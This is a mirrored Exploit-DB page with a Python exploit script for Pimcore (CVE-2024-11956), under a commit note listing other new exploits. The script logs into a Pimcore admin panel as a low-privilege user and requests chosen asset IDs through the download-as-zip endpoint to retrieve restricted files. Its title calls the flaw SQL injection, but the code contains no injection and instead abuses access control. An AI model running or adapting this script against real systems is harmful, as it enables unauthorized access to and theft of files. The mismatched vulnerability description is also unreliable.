bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/webapps/52193.py
Exploit-DB 0f3d104e83 DB: 2025-04-15 
15 changes to exploits/shellcodes/ghdb

ZTE ZXHN H168N 3.1 - Remote Code Execution (RCE) via authentication bypass
GestioIP 3.5.7 - Cross-Site Request Forgery (CSRF)
GestioIP 3.5.7 - Cross-Site Scripting (XSS)
GestioIP 3.5.7 - Reflected Cross-Site Scripting (Reflected XSS)
GestioIP 3.5.7 - Remote Command Execution (RCE)
GestioIP 3.5.7 - Stored Cross-Site Scripting (Stored XSS)
OpenPanel 0.3.4 - Directory Traversal
OpenPanel 0.3.4 - Incorrect Access Control
OpenPanel 0.3.4 - OS Command Injection
OpenPanel Copy and View functions in the File Manager 0.3.4 - Directory Traversal

Pimcore 11.4.2 - Stored cross site scripting

Pimcore customer-data-framework 4.2.0 -  SQL injection

SilverStripe 5.3.8  - Stored Cross Site Scripting (XSS) (Authenticated)

Xinet Elegant 6 Asset Lib Web UI 6.1.655 - SQL Injection
2025-04-15 00:16:26 +00:00

42 lines
No EOL
1.4 KiB
Python
Executable file
Raw Blame History

# Exploit Title: Pimcore customer-data-framework 4.2.0 - SQL injection
# Date: 01/28/2025
# Exploit Author: maeitsec
# Vendor Homepage: https://pimcore.com/
# Software Link: https://github.com/pimcore/pimcore
# Version: Pimcore versions prior to 10.5.21
# Tested on: Ubuntu 20.04 with Pimcore 10.5.20
# CVE: CVE-2024-11956
import requests
# Replace with target URL and credentials
TARGET_URL = "http://example.com/pimcore"
USERNAME = "low_privilege_user"
PASSWORD = "password123"
# Authenticate and get session
session = requests.Session()
login_data = {
"username": USERNAME,
"password": PASSWORD
}
login_response = session.post(f"{TARGET_URL}/admin/login", data=login_data)
if "Login successful" in login_response.text:
print("[+] Authenticated successfully.")
# Exploit the downloadAsZip functionality
download_url = f"{TARGET_URL}/admin/asset/download-as-zip"
payload = {
"ids[]": ["1", "2", "3"] # Replace with IDs of restricted files/folders
}
download_response = session.post(download_url, data=payload)
if download_response.status_code == 200:
print("[+] Exploit successful. Restricted files downloaded.")
with open("restricted_files.zip", "wb") as f:
f.write(download_response.content)
else:
print("[-] Exploit failed. Server returned:", download_response.status_code)
else:
print("[-] Authentication failed.")
Reference in a new issue View git blame Copy permalink